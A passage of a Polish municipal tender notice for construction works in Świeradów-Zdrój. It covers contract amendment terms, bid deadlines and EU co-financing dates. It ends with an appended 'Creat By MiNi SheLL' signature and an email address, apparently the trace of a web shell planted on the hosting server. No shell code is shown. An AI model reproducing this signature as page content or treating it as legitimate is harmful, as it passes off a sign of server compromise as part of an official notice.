3.  Wynagrodzenie określone w § 3 ust. 1 obejmuje wszelkie zobowiązania Zamawiającego w stosunku do Wykonawcy i może ulec zmianie jedynie z tytułu:
a) obniżenia jakości elementu przedmiotu umowy. W tym przypadku obniżenie wynagrodzenia Wykonawcy będzie proporcjonalne do stopnia obniżenia wartości estetycznej i użytkowej przedmiotu odbioru. Obniżenie wynagrodzenia z tytułu jakości elementu robót nie pozbawia Zamawiającego prawa do rękojmi za ten element przedmiotu umowy,
b) w przypadku nie wykonania przez Wykonawcę pełnego zakresu robót, stanowiącego przedmiot umowy.
4. Wszystkie powyżej  opisane w ust. 2 okoliczności stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. Warunkiem dokonania zmian postanowień zawartej umowy w formie aneksu do umowy jest zgoda obu stron wyrażona na piśmie, pod rygorem nieważności zmian.
4. O wystąpieniu okoliczności mogących wpłynąć na zmianę  terminów Wykonawca winien poinformować Zamawiającego niezwłocznie, tj. w terminie  3 dni roboczych od wystąpienia  tych okoliczności  i natychmiast odnotować to w dzienniku budowy. 
5. Strony z powodów, jakie mogą mieć wpływać na zmianę terminu wykonywania robót, wyłączają niedogodności związane z pogodą typową dla okresu wykonywania robót w miejscu budowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.umswieradowzdroj.nv.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Świeradów-Zdrój ul. 11- go Listopada 35 Świeradów-Zdrój pokój 21a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2015 godzina 14:00, miejsce: Urząd Miasta Świeradów-Zdrój ul. 11- go Listopada 35 Świeradów-Zdrój sekretariat 1d.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską we środków Europejskiego Funduszu Rolnego na Rzecz Rozwoju Obszarów Wiejskich w ramach działania Podstawowe usługi dla gospodarki i ludności wiejskiej objętego Programem Rozwoju Obszarów Wiejskich na lata 2007-2013
UWAGA: Zamawiający informuje, iż  terminy:
a) zakończenia robót budowlanych do dnia 15 maja 2015 r., przez co rozumie się  termin zakończenia całości robót budowlanych, czyli wybudowanie obiektów budowlanych objętych przedmiotem zamówienia i zgłoszenie do odbioru,
b) odbioru  końcowego lub odmowy dokonania odbioru końcowego w terminie do 31 maja 2015r.,
c) rozliczenia inwestycji przez Zamawiającego z instytucją współfinansująca tj. Samorządem Województwa Dolnośląskiego do dnia 25 czerwca 2015r.
 są ostateczne i nieprzekraczalne z uwagi na ostateczne zakończenie okresu programowania na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com